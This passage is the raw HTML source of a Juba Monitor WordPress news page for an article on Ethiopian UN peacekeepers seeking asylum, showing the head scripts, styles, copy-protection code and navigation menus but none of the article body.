<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="profile" href="https://gmpg.org/xfn/11"/>
	<link rel="pingback" href="https://www.jubamonitor.com/xmlrpc.php"/>
	<style type='text/css'>/*
Welcome to the Special Recent Posts Custom CSS editor!
Please add all your custom CSS here and avoid modifying the core plugin files, since that'll make upgrading the plugin problematic. Your custom CSS will be loaded in your <head> section of your wordpress theme, which means that your rules will take precedence. Just add your CSS here for what you want to change, you don't need to copy all the plugin's stylesheet content.
*/</style><title>PROTECTION-UN peacekeepers seek asylum &#8211; Juba Monitor</title>
<script type="application/javascript">var bingo_ruby_ajax_url = "https://www.jubamonitor.com/wp-admin/admin-ajax.php"</script><link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Juba Monitor &raquo; Feed" href="https://www.jubamonitor.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Juba Monitor &raquo; Comments Feed" href="https://www.jubamonitor.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.jubamonitor.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='srp-layout-stylesheet-css'  href='https://www.jubamonitor.com/wp-content/plugins/special-recent-posts/css/layout.css?ver=5.1.8' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_plugin_style-css'  href='https://www.jubamonitor.com/wp-content/plugins/bingo-ruby-core/assets/style.css?ver=1.6' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='https://www.jubamonitor.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.8' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://www.jubamonitor.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/bootstrap.css?ver=v3.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/font-awesome.css?ver=v4.7.0' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_miscellaneous-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/miscellaneous.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_main-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/css/theme-style.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_responsive-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/css/theme-responsive.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_default-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/style.css?ver=2.4' type='text/css' media='all' />
<style id='bingo_ruby_style_default-inline-css' type='text/css'>
.total-caption { font-family :Lato;}.banner-background-color { background-color: #ffffff; }.footer-copyright-wrap p { color: #dddddd; }.footer-copyright-wrap { background-color: #242424; }.post-excerpt{ font-size :14px;}
</style>
<link rel='stylesheet' id='frp-frontend-css'  href='https://www.jubamonitor.com/wp-content/plugins/flexible-recent-posts/css/frp-front.css?ver=5.1.8' type='text/css' media='all' />
<link rel='stylesheet' id='redux-google-fonts-bingo_ruby_theme_options-css'  href='https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%2C700%2C900%2C100italic%2C300italic%2C400italic%2C700italic%2C900italic%7CMontserrat%3A700%2C400%2C600%2C500&#038;ver=1613491069' type='text/css' media='all' />
<link rel='stylesheet' id='rps-style-css'  href='https://www.jubamonitor.com/wp-content/plugins/recent-posts-slider/css/style.css?ver=5.1.8' type='text/css' media='all' />
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/table-creator/public/assets/js/datatables.min.js?ver=1.0.0'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/html5.min.js?ver=3.7.3'></script>
<![endif]-->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-153871760-5' async></script>
<script type='text/javascript'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-153871760-5', {"anonymize_ip":true} );
</script>
<link rel='https://api.w.org/' href='https://www.jubamonitor.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.jubamonitor.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.jubamonitor.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Students continue to protest over unpaid arrears' href='https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/' />
<link rel='next' title='Refugees to benefit from business grant' href='https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/' />
<meta name="generator" content="WordPress 5.1.8" />
<link rel="canonical" href="https://www.jubamonitor.com/protection-un-peacekeepers-seek-asylum/" />
<link rel='shortlink' href='https://www.jubamonitor.com/?p=41127' />
<link rel="alternate" type="application/json+oembed" href="https://www.jubamonitor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.jubamonitor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.8.1" /><style type="text/css" media="screen"></style><script id="wpcp_disable_selection" type="text/javascript">
//<![CDATA[
var image_save_msg='You Can Not Save images!';
	var no_menu_msg='Context Menu disabled!';
	var smessage = "Content is protected !!";

function disableEnterKey(e)
{
	if (e.ctrlKey){
     var key;
     if(window.event)
          key = window.event.keyCode;     //IE
     else
          key = e.which;     //firefox (97)
    //if (key != 17) alert(key);
     if (key == 97 || key == 65 || key == 67 || key == 99 || key == 88 || key == 120 || key == 26 || key == 85  || key == 86 || key == 83 || key == 43)
     {
          show_wpcp_message('You are not allowed to copy content or view source');
          return false;
     }else
     	return true;
     }
}

function disable_copy(e)
{	
	var elemtype = e.target.nodeName;
	var isSafari = /Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor);
	elemtype = elemtype.toUpperCase();
	var checker_IMG = '';
	if (elemtype == "IMG" && checker_IMG == 'checked' && e.detail >= 2) {show_wpcp_message(alertMsg_IMG);return false;}
	if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED")
	{
		if (smessage !== "" && e.detail == 2)
			show_wpcp_message(smessage);
		
		if (isSafari)
			return true;
		else
			return false;
	}	
}
function disable_copy_ie()
{
	var elemtype = window.event.srcElement.nodeName;
	elemtype = elemtype.toUpperCase();
	if (elemtype == "IMG") {show_wpcp_message(alertMsg_IMG);return false;}
	if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED")
	{
		//alert(navigator.userAgent.indexOf('MSIE'));
			//if (smessage !== "") show_wpcp_message(smessage);
		return false;
	}
}	
function reEnable()
{
	return true;
}
document.onkeydown = disableEnterKey;
document.onselectstart = disable_copy_ie;
if(navigator.userAgent.indexOf('MSIE')==-1)
{
	document.onmousedown = disable_copy;
	document.onclick = reEnable;
}
function disableSelection(target)
{
    //For IE This code will work
    if (typeof target.onselectstart!="undefined")
    target.onselectstart = disable_copy_ie;
    
    //For Firefox This code will work
    else if (typeof target.style.MozUserSelect!="undefined")
    {target.style.MozUserSelect="none";}
    
    //All other  (ie: Opera) This code will work
    else
    target.onmousedown=function(){return false}
    target.style.cursor = "default";
}
//Calling the JS function directly just after body load
window.onload = function(){disableSelection(document.body);};
//]]>
</script>
	<script id="wpcp_disable_Right_Click" type="text/javascript">
	//<![CDATA[
	document.ondragstart = function() { return false;}
	/* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	Disable context menu on images by GreenLava Version 1.0
	^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ */
	    function nocontext(e) {
	       return false;
	    }
	    document.oncontextmenu = nocontext;
	//]]>
	</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script>
(adsbygoogle = window.adsbygoogle || []).push({
google_ad_client: "ca-pub-2465781200142527",
enable_page_level_ads: true,
tag_partner: "site_kit"
});
</script>
		<meta property="og:title" content="PROTECTION-UN peacekeepers seek asylum"/><meta property="og:type" content="article"/><meta property="og:url" content="https://www.jubamonitor.com/protection-un-peacekeepers-seek-asylum/"/><meta property="og:site_name" content="Juba Monitor"/><meta property="og:description" content="&lt;!-- wp:paragraph --&gt; By Okan Thomas Onyango/James Atem Kuir &lt;!-- /wp:paragraph --&gt; &lt;!-- wp:paragraph --&gt; Fifteen (15) out of 169 Ethiopian peacekeepers that were scheduled to return home and who"/><meta property="og:image" content="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"/><link rel="icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1-50x50.jpg" sizes="32x32" />
<link rel="icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" />
<meta name="msapplication-TileImage" content="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" />
<style type="text/css" title="dynamic-css" class="options-output">.footer-inner{background-color:#282828;background-repeat:no-repeat;background-size:cover;background-attachment:fixed;background-position:center center;}.topbar-wrap{font-family:Lato;text-transform:capitalize;font-weight:400;font-style:normal;font-size:13px;}.main-menu-inner,.off-canvas-nav-inner{font-family:Lato;text-transform:uppercase;letter-spacing:0px;font-weight:700;font-style:normal;font-size:15px;}.main-menu-inner .sub-menu,.off-canvas-nav-inner .sub-menu{font-family:Lato;text-transform:capitalize;letter-spacing:0px;font-weight:400;font-style:normal;font-size:14px;}.logo-wrap.is-logo-text .logo-text h1{font-family:Montserrat;text-transform:uppercase;letter-spacing:-1px;font-weight:700;font-style:normal;font-size:40px;}.logo-mobile-text span{font-family:Montserrat;text-transform:uppercase;letter-spacing:-1px;font-weight:700;font-style:normal;font-size:28px;}body, p{font-family:Lato;line-height:24px;font-weight:400;font-style:normal;color:#282828;font-size:15px;}.post-title.is-size-1{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:36px;}.post-title.is-size-2{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:30px;}.post-title.is-size-3{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:21px;}.post-title.is-size-4{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:18px;}.post-title.is-size-5{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:14px;}.post-title.is-size-6{font-family:Montserrat;font-weight:400;font-style:normal;color:#282828;font-size:13px;}h1,h2,h3,h4,h5,h6{font-family:Montserrat;text-transform:none;font-weight:700;font-style:normal;}.post-meta-info,.single-post-top,.counter-element{font-family:Lato;font-weight:400;font-style:normal;color:#999;font-size:12px;}.post-cat-info{font-family:Lato;text-transform:uppercase;font-weight:700;font-style:normal;font-size:11px;}.block-header-wrap{font-family:Montserrat;text-transform:uppercase;font-weight:600;font-style:normal;font-size:18px;}.block-ajax-filter-wrap{font-family:Montserrat;text-transform:uppercase;font-weight:500;font-style:normal;font-size:11px;}.widget-title{font-family:Montserrat;text-transform:uppercase;font-weight:600;font-style:normal;font-size:14px;}.breadcrumb-wrap{font-family:Lato;text-transform:none;font-weight:400;font-style:normal;color:#777777;font-size:12px;}</style></head>
<body data-rsssl=1 class="post-template-default single single-post postid-41127 single-format-standard unselectable ruby-body is-full-width is-navbar-sticky is-smart-sticky"  itemscope  itemtype="https://schema.org/WebPage" >
<div class="off-canvas-wrap is-dark-text">
	<div class="off-canvas-inner">
		<a href="#" id="ruby-off-canvas-close-btn"><i class="ruby-close-btn" aria-hidden="true"></i></a>
		<nav id="ruby-offcanvas-navigation" class="off-canvas-nav-wrap">
			<div class="menu-big-menu-container"><ul id="offcanvas-nav" class="off-canvas-nav-inner"><li id="menu-item-9598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li>
<li id="menu-item-9582" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23"><a href="https://www.jubamonitor.com/category/news-2/">News</a>
<ul class="sub-menu">
	<li id="menu-item-9583" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9583 is-category-2"><a href="https://www.jubamonitor.com/category/news/">National News</a></li>
</ul>
</li>
<li id="menu-item-9584" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a>
<ul class="sub-menu">
	<li id="menu-item-9585" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9585 is-category-18"><a href="https://www.jubamonitor.com/category/opinion/editorial/">Editorial</a></li>
	<li id="menu-item-40975" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40975 is-category-60"><a href="https://www.jubamonitor.com/category/a-foot-for-thought/">A foot for thought</a></li>
	<li id="menu-item-9592" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9592 is-category-15"><a href="https://www.jubamonitor.com/category/opinion/columnists/">Columnists</a></li>
	<li id="menu-item-9593" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9593 is-category-16"><a href="https://www.jubamonitor.com/category/opinion/columnists/lets-speak-out/">Let&#8217;s Speak Out</a></li>
</ul>
</li>
<li id="menu-item-9586" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li>
<li id="menu-item-9587" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10"><a href="https://www.jubamonitor.com/category/sports/">Sports</a></li>
<li id="menu-item-9589" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li>
<li id="menu-item-11765" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li>
<li id="menu-item-9590" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li>
<li id="menu-item-9588" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a></li>
</ul></div>		</nav>
												<div class="off-canvas-social-wrap">
					<a class="icon-facebook icon-social" title="facebook" href="https://web.facebook.com/TheJubaMonitor/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter icon-social" title="twitter" href="https://twitter.com/JubaMonitor" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>				</div>
										<div class="off-canvas-widget-section-wrap canvas-sidebar-wrap">
				<div class="canvas-sidebar-inner">
									</div>
			</div>
			</div>
</div><div id="ruby-site" class="site-outer">
	<div class="header-wrap header-style-1">
	<div class="header-inner">
		<div class="topbar-wrap topbar-style-1 is-light-text">
	<div class="ruby-container">
		<div class="topbar-inner container-inner clearfix">
			<div class="topbar-left">
				<div class="topbar-info">
			     <span class="info-email"><i class="fa fa-envelope" aria-hidden="true"></i><span>jubamonitor@yahoo.com</span></span>
     </div>				
<div class="topbar-date">
	<span>Wednesday, February 24th, 2021</span>
</div>							</div>
			<div class="topbar-right">
				
	<div class="topbar-social social-tooltips">
		<a class="icon-facebook icon-social" title="facebook" href="https://web.facebook.com/TheJubaMonitor/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter icon-social" title="twitter" href="https://twitter.com/JubaMonitor" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>	</div>
                							</div>
		</div>
	</div>
</div>

		<div class="banner-wrap banner-background-color">
			
			<div class="ruby-container">
				<div class="banner-inner container-inner clearfix">
					<div class="logo-wrap is-logo-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-inner">
							<a href="https://www.jubamonitor.com/" class="logo" title="Juba Monitor">
				<img data-no-retina src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg" height="" width=""  alt="Juba Monitor">
			</a>
						</div><!--#logo inner-->
    </div>
					
	<div class="banner-ad-wrap">
		<div class="banner-ad-inner">
                                                <div class="banner-ad-image">
                        <img src="https://www.jubamonitor.com/wp-content/uploads/2019/01/jubamonitor-ads-2.jpg" alt="Juba Monitor">
                    </div>
                            		</div>
	</div>
				</div>
			</div>
		</div>

		<div class="navbar-outer clearfix">
			<div class="navbar-wrap">
				<div class="ruby-container">
					<div class="navbar-inner container-inner clearfix">
						<div class="navbar-left">
							<div class="off-canvas-btn-wrap">
	<div class="off-canvas-btn">
		<a href="#" class="ruby-trigger" title="off canvas button">
			<span class="icon-wrap"></span>
		</a>
	</div>
</div>							<div class="logo-mobile-wrap is-logo-mobile-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-mobile-inner">
        <a href="https://www.jubamonitor.com/" class="logo" title="Juba Monitor">
            <img height="" width="" src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorMOBILELOGO.jpg" alt="Juba Monitor">
        </a>
	</div>
</div>
							<nav id="ruby-main-menu" class="main-menu-wrap"  itemscope  itemtype="https://schema.org/SiteNavigationElement" >
	<div class="menu-big-menu-container"><ul id="main-nav" class="main-menu-inner"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/news-2/">News</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><ul class="sub-menu is-sub-default">	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9583 is-category-2" data-mega_sub_filter="2" ><a href="https://www.jubamonitor.com/category/news/">National News</a></li></ul><div id="ruby_mega_9582" class="ruby-block-wrap block-mega-menu block-mega-menu-sub is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9582 data-block_name= bingo_ruby_mega_block_cat_sub data-posts_per_page= 4 data-block_page_max= 979 data-block_page_current= 1 data-category_id= 23 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/" rel="bookmark" title="Refugees to benefit from business grant">Refugees to benefit from business grant</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/protection-un-peacekeepers-seek-asylum/" rel="bookmark" title="PROTECTION-UN peacekeepers seek asylum">PROTECTION-UN peacekeepers seek asylum</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" title="Students continue to protest over unpaid arrears" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/South-Sudanese-students-who-graduated-while-in-Zimbabwe-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-33" href="https://www.jubamonitor.com/category/education/" title="Education">Education</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" rel="bookmark" title="Students continue to protest over unpaid arrears">Students continue to protest over unpaid arrears</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/covid-19-cases-soar-to-over-7000/" title="Covid-19 cases soar to over 7,000" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="496" height="328" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Medics-in-their-protective-gears-at-the-Ministry-of-Health.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/02/Medics-in-their-protective-gears-at-the-Ministry-of-Health.jpg 496w, https://www.jubamonitor.com/wp-content/uploads/2021/02/Medics-in-their-protective-gears-at-the-Ministry-of-Health-300x198.jpg 300w" sizes="(max-width: 496px) 100vw, 496px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/covid-19-cases-soar-to-over-7000/" rel="bookmark" title="Covid-19 cases soar to over 7,000">Covid-19 cases soar to over 7,000</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><ul class="sub-menu is-sub-default">	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9585 is-category-18" data-mega_sub_filter="18" ><a href="https://www.jubamonitor.com/category/opinion/editorial/">Editorial</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40975 is-category-60" data-mega_sub_filter="60" ><a href="https://www.jubamonitor.com/category/a-foot-for-thought/">A foot for thought</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9592 is-category-15" data-mega_sub_filter="15" ><a href="https://www.jubamonitor.com/category/opinion/columnists/">Columnists</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9593 is-category-16" data-mega_sub_filter="16" ><a href="https://www.jubamonitor.com/category/opinion/columnists/lets-speak-out/">Let&#8217;s Speak Out</a></li></ul><div id="ruby_mega_9584" class="ruby-block-wrap block-mega-menu block-mega-menu-sub is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9584 data-block_name= bingo_ruby_mega_block_cat_sub data-posts_per_page= 4 data-block_page_max= 593 data-block_page_current= 1 data-category_id= 5 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/where-is-your-guard-of-honour/" rel="bookmark" title="WHERE IS YOUR GUARD OF HONOUR">WHERE IS YOUR GUARD OF HONOUR</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/traffic-flow-must-be-restored-in-and-around-kubri/" rel="bookmark" title="TRAFFIC FLOW MUST BE RESTORED IN AND AROUND KUBRI">TRAFFIC FLOW MUST BE RESTORED IN AND AROUND KUBRI</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/when-on-your-knees-remember-god/" title="When on your knees, remember God" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="381" height="271" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Sometimes.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/02/Sometimes.jpg 381w, https://www.jubamonitor.com/wp-content/uploads/2021/02/Sometimes-300x213.jpg 300w" sizes="(max-width: 381px) 100vw, 381px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://www.jubamonitor.com/category/opinion/" title="Opinion">Opinion</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/when-on-your-knees-remember-god/" rel="bookmark" title="When on your knees, remember God">When on your knees, remember God</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/technology-of-purpose/" rel="bookmark" title="TECHNOLOGY OF PURPOSE">TECHNOLOGY OF PURPOSE</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" 